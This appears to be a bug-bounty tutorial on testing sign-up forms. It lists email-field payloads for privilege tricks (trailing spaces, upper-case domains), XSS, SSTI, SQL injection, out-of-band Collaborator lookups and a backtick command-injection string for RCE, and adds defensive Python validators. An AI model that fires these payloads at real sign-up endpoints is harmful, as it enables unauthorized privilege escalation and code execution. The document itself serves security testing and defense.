This post continues the earlier bug bounty hunter series article "How to test Sign up functionality" and keeps walking through the test flow for the sign-up feature. Related articles include:
Case 8
When signing up, try a company email address that contains a space, for example: "admin@company.com "
(note the space after .com)
You may run into something unexpected (for example, the new account may be granted extra privileges).
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

firstname=I&lastname=am&email=admin@company.com &password=*****&captcha=Random&token=CSRF
Case 9
When signing up with a company email, try writing the address in uppercase, e.g. admin@COMPANY.COM; you may be granted extra privileges or gain access to more functionality.
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

firstname=I&lastname=am&email=admin@COMPANY.COM &password=*****&captcha=Random&token=CSRF
Case 10
Write the email in the following forms; you may make some unexpected discoveries:
admin@gmail.com@company.com
me+(@gmail.com)@company.com
"me@gmail.com"@company.com
"<me@gmail.com>"@company.com
"me@gmail.com;"@company.com
"me@gmail.com+"@company.com
Case 11
Same idea as the tip above, but replace gmail with googlemail.com:
admin@googlemail.com@company.com
me+(@googlemail.com)@company.com
"me@googlemail.com"@company.com
"<me@googlemail.com>"@company.com
"me@googlemail.com;"@company.com
"me@googlemail.com+"@company.com
Case 12
Try the following payloads and check whether they trigger XSS, SSTI or SQLi:
me+(<script>alert(0)</script>)@gmail.com
me(<script>alert(0)</script>)@gmail.com
me@gmail(<script>alert(0)</script>).com
"<script>alert(0)</script>"@gmail.com
"<%= 7 * 7 %>"@gmail.com
me+(${{7*7}})@gmail.com
"' OR 1=1 -- '"@gmail.com
"me); DROP TABLE users;--"@gmail.com
%@gmail.com
Case 13
Try the following payloads to pull back-end information or internal IPs:
me@id.collaborator.net
me@[id.collaborator.net]
user(;me@id.collaborator.net)@gmail.com
me@id.collaborator.net(@gmail.com)
me+(@gmail.com)@id.collaborator.net
<me@id.collaborator.net>user@gmail.com
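Every variant in cases 8 through 13 works because the sign-up handler either compares the raw string against a privileged-domain list, or stores it un-normalised so that "admin@company.com ", "admin@COMPANY.COM" and "admin@company.com" end up as three different accounts. The validator below is an added example (it is not code from the original post) that shows the defensive side: strip surrounding whitespace, fold the domain to lower case, accept only a deliberately narrow address shape (no quoted local parts, comments, domain literals, second "@", "%" or backticks), and make both the privilege decision and the uniqueness check on the canonical value. PRIVILEGED_DOMAINS and the SAMPLES list are constructed for this example.

```python
import re

# Constructed for this example: domains whose sign-ups receive extra privileges.
PRIVILEGED_DOMAINS = {"company.com"}

# Deliberately narrower than RFC 5322: no quoted local parts ("..."@), no
# comments ((...)), no domain literals ([...]), no '%' or backticks.
# Anything outside this shape is rejected outright rather than "cleaned up".
_LOCAL_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._+-]*$")
_LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def normalize_signup_email(raw: str) -> str:
    """Return the canonical form of a sign-up address, or raise ValueError.

    Canonical form: surrounding whitespace removed, exactly one '@', a plain
    local part, a hostname-style domain folded to lower case. Both the
    privilege decision and the "address already registered" check must use
    this value, never the raw input, or the trailing-space and upper-case
    variants become distinct identities in the database.
    """
    value = raw.strip()
    if not value.isascii():
        raise ValueError("non-ASCII characters")
    if any(c.isspace() or ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise ValueError("embedded whitespace or control character")
    if value.count("@") != 1:
        raise ValueError("exactly one '@' required")
    local, domain = value.split("@")
    if not _LOCAL_RE.match(local) or ".." in local or local.endswith("."):
        raise ValueError("local part not allowed")
    labels = domain.split(".")
    if len(labels) < 2 or not all(_LABEL_RE.match(lbl) for lbl in labels):
        raise ValueError("domain is not a plain hostname")
    if not labels[-1].isalpha():
        raise ValueError("top-level label must be alphabetic")
    return f"{local}@{domain.lower()}"


def is_privileged(canonical: str) -> bool:
    """Privilege decision on the canonical domain only."""
    return canonical.rsplit("@", 1)[1] in PRIVILEGED_DOMAINS


def classify(raw: str) -> dict:
    """One record per submitted address: accepted?, canonical form, privilege, reason."""
    try:
        canonical = normalize_signup_email(raw)
    except ValueError as exc:
        return {"ok": False, "canonical": None, "privileged": False, "reason": str(exc)}
    return {"ok": True, "canonical": canonical,
            "privileged": is_privileged(canonical), "reason": ""}


# Constructed inputs mirroring the variants discussed above.
SAMPLES = [
    "admin@company.com ",                        # case 8: trailing space
    "admin@COMPANY.COM",                         # case 9: upper-case domain
    "admin@gmail.com@company.com",               # case 10: two '@'
    '"me@gmail.com"@company.com',                # case 10: quoted local part
    "me+(@googlemail.com)@company.com",          # case 11: comment in local part
    "me+(<script>alert(0)</script>)@gmail.com",  # case 12: XSS payload
    "%@gmail.com",                               # case 12: bare '%'
    "me@[id.collaborator.net]",                  # case 13: domain literal
    "me@gmail.com",                              # ordinary external user
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:45} -> {classify(sample)}")
```

Note that "admin@company.com " and "admin@COMPANY.COM" both canonicalise to admin@company.com: if that account already exists the uniqueness check rejects them, and if it does not, the privilege should still only be granted after the canonical address has been verified by mail.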
Case 14
Sometimes the system pings your host before sending the mail. Try an email address whose Burp Collaborator domain carries an injected system command to achieve RCE, as shown below:
POST /signUp HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Origin: https://www.company.com
Content-Length: Number

firstname=I&lastname=am&email=me@`whoami`.id.collaborator.net&password=********&captcha=Random&token=CSRF
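The backtick payload in case 14 only works when the application splices the mail domain into a shell command line, so /bin/sh expands the command substitution before ping ever runs. The snippet below is an added example (not code from the original post) that puts that pattern beside the hardened form: the domain is checked against a hostname allow-list and passed to ping as a separate argv element with no shell in between. The function names, the regex and the sample addresses are assumptions constructed for this example.

```python
import re
import subprocess

# Hostname shape accepted for the reachability probe: dotted labels of
# letters, digits and hyphens, with an alphabetic TLD. Backticks, '$', ';',
# spaces and a leading '-' (which ping would read as an option) all fail.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}$"
)


def mail_domain(email: str) -> str:
    """Part after the last '@', lower-cased; this is what the probe resolves."""
    return email.rsplit("@", 1)[-1].lower()


def is_safe_mail_domain(email: str) -> bool:
    """True only when the domain is a plain hostname the probe may touch."""
    return _HOSTNAME_RE.match(mail_domain(email)) is not None


def build_ping_command_unsafe(email: str) -> str:
    """The pattern behind case 14: the domain is pasted into a shell command
    line, so the shell evaluates any `...` or $(...) inside it before ping
    runs. Returned as a string only, to contrast with build_ping_argv; it is
    never executed here."""
    return "ping -c 1 " + mail_domain(email)


def build_ping_argv(email: str) -> list:
    """Hardened form: validate the hostname, then hand it to ping as its own
    argv element. No shell is involved, so the value cannot become syntax."""
    domain = mail_domain(email)
    if not _HOSTNAME_RE.match(domain):
        raise ValueError(f"refusing to probe hostname {domain!r}")
    return ["ping", "-c", "1", domain]


def probe_mail_domain(email: str, timeout: float = 5.0) -> bool:
    """Run the hardened probe. shell=False passes the argv list straight to
    execve, so the domain string is only ever an argument to ping."""
    argv = build_ping_argv(email)
    result = subprocess.run(argv, shell=False, capture_output=True, timeout=timeout)
    return result.returncode == 0


if __name__ == "__main__":
    # Constructed samples: the case 14 payload beside a benign address.
    for sample in ["me@`whoami`.id.collaborator.net", "me@example.com"]:
        print("unsafe command line:", build_ping_command_unsafe(sample))
        try:
            print("hardened argv:     ", build_ping_argv(sample))
        except ValueError as exc:
            print("hardened argv:     ", exc)
```

The better fix is usually to not shell out at all: an in-process DNS lookup (for example socket.getaddrinfo on the validated domain) answers the same "does this domain exist" question without any command line to inject into, and it should only be attempted after the address has passed the sign-up validator.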